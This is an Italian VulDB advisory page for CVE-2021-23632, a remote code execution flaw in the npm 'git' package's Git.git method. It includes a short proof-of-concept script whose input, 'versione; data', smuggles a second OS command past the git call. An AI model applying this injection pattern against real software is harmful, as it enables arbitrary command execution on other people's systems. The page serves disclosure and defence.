CVE-2021-23632 in gitinformazioni

Riassunto

di VulDB • 18/06/2026

Tutte le versioni del pacchetto git sono vulnerabili a Remote Code Execution (RCE) a causa della mancanza di sanitizzazione nel metodo `Git.git`, che consente l'esecuzione di comandi OS anziché solo comandi git. Passaggi per riprodurre 1. Creare un file denominato exploit.js con il seguente contenuto: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "versione; data"; repo.git(user_input, function(err, result) { console.log(result); }) 2. Nella stessa directory di exploit.js, eseguire npm install git. 3. Eseguire exploit.js: node exploit.js. Dovresti vedere gli output sia del comando a riga di comando `git version` che del comando `date`. Nota che il repository Git repo-test non deve essere presente per far funzionare questo PoC.

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Responsabile

Snyk

Prenotare

08/01/2021

Divulgazione

17/03/2022

Moderazione

accettato

CPE

pronto

EPSS

0.02201

KEV

no

Attività

molto basso

Fonti

Do you want to use VulDB in your project?

Use the official API to access entries easily!